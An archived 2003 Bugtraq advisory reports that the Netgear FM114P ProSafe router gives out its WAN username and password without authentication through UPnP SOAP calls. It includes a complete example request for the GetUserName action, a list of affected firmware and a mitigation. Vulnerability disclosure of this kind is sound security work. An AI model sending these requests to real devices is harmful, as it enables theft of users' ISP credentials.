lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <WEBSERVEiILeFviwyoe00000009@intex.ath.cx>
Date: Wed, 2 Apr 2003 19:58:57 +0200
From: Björn Stickler <stickler@....informatik.tu-darmstadt.de>
To: <bugtraq@...urityfocus.com>
Subject: Another security problem in Netgear FM114P ProSafe Wireless Router firmware


hi,
i found another security problem in netgear prosafe wireless router model
FM114P:
when remote-access and upnp features are enabled, the WAN connection
username and password can be retrieved without any authentication using
upnp. if remote management is enabled anyone can do this from the web. this
is done by using upnp soap requests to the router with the functions
GetUserName and GetPassword. i don´t know why such functions exist, because
router configuration is normally done via web-interface.

---- begin of example request to get username --------------

POST /upnp/service/WANPPPConnection HTTP/1.1
HOST: 192.168.0.1:80
SOAPACTION: "urn:schemas-upnp-org:service:WANPPPConnection:1#GetUserName"
CONTENT-TYPE: text/xml ; charset="utf-8"
Content-Length: 289

<?xml version="1.0" encoding="utf-8"?>
<s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
   <s:Body>
      <u:GetUserName
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1" />
   </s:Body>
</s:Envelope>

---- end of example request to get username   --------------


affected firmware versions: --> v1.4 Beta Release 21 has been tested
                            --> all previous versions with upnp may be
affected

solution: disable remote management and/or upnp until bug is fixed by
netgear

regards, b.stickler


http://intex.ath.cx




Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ